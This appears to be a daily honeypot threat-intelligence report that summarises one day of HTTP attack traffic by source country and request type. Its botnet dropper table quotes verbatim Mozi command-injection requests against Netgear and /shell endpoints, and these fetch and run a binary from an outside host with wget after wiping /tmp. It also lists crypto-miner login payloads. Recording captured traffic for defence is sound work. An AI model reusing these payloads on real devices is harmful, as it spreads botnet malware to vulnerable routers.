Report: 2025-06-01

Author: Shoggoth Industries

Daily Report: 2025-06-01

Executive summary

Interaction report on the HTTP services of various honeypots around the world.

executive_summary

In today’s report, we detected 5 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 10 new requests that have never been observed before (these were added to the monitored request database).

A total of 3619 requests were recorded during the day, originating from 5 different countries, with a peak of 2692 requests coming from GB.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more information, contact us at social@shoggoth.industries.

| source_country | targeted_country |
| --- | --- |
| JP | Germany |
| US | Germany |
| US | Dubai |
| CN | Georgia |

botnet_dropper_behaviour

| remote_addr | request |
| --- | --- |
| 124.131.137.180 | `GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://124.131.137.180:49285/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0` |
| 59.96.136.212 | `GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.96.136.212:42274/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0` |
| 59.97.251.239 | `GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.97.251.239:36473/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0` |
| 70.93.160.137 | `GET /shell?cd+/tmp;rm+-rf+*;wget+http://70.93.160.137:47151/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1` |
| 157.245.189.92 | `GET /shell?cd+/tmp;rm+-rf+*;wget+http://70.93.160.137:47151/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1` |

request

The requests listed here are those that have not yet been integrated into the request database.

number_of_occurencerequest
762GET /relogin.rsp HTTP/1.1
10401GET HTTP/1.1 HTTP/1.1
10641\x00\x0E8\x0Bs\xC5\xA3bO\xE4\xC4\x00\x00\x00\x00\x00
10741{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220xc6a54e2561cbf4beb2c1f8239a04a6a34c9ad8b1\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
10751{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2244HMW9DLQmCGg3yT8DNDwVUUkb4Nq92pb8vviaTCtFqM6aezn65KFCghuXnurvrAcLfnftm2VDpuUCQkjNF7QEqCAZt4MS9\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
10901\x00\x0E8\xF6\x86\xA7\x8C\xA8\xEE\xAE\xF4\x00\x00\x00\x00\x00
11111\x00\x0E8\x14\xB4]9$\xC5Y\x8F\x00\x00\x00\x00\x00
11341\x00\x0E8q\xE7JP\xDA\x7F\x8F\x0E\x00\x00\x00\x00\x00
11941GET /phpmyadmin4.8.5/index.php HTTP/1.1
12031POST /json_rpc HTTP/1.1

country_iso_code

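|  | number_of_occurence | country_iso_code |
| --- | --- | --- |
| 0 | 2692 | GB |
| 1 | 206 | US |
| 2 | 138 | BG |
| 3 | 104 | CN |
| 4 | 84 | JP |
| 5 | 63 | NL |
| 6 | 50 | DE |
| 7 | 40 | ES |
| 8 | 38 | FR |
| 9 | 25 | PL |
| 10 | 16 | IN |
| 11 | 16 | GH |
| 12 | 14 | SC |
| 13 | 13 | CH |
| 14 | 13 | AU |
| 15 | 9 | CA |
| 16 | 8 | IL |
| 17 | 8 | BR |
| 18 | 7 | HK |
| 19 | 7 | UA |
| 20 | 6 | RO |
| 21 | 6 | RU |
| 22 | 6 | LT |
| 23 | 5 | ZA |
| 24 | 5 | IR |
| 25 | 5 | BE |
| 26 | 5 | NG |
| 27 | 4 | KR |
| 28 | 4 | AO |
| 29 | 4 | MN |
| 30 | 3 | PT |
| 31 | 2 | MC |
| 32 | 2 | IE |
| 33 | 2 | KW |
| 34 | 2 | KZ |
| 35 | 2 | VN |
| 36 | 2 | ID |
| 37 | 1 | EE |
| 38 | 1 | TR |
| 39 | 1 | SG |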
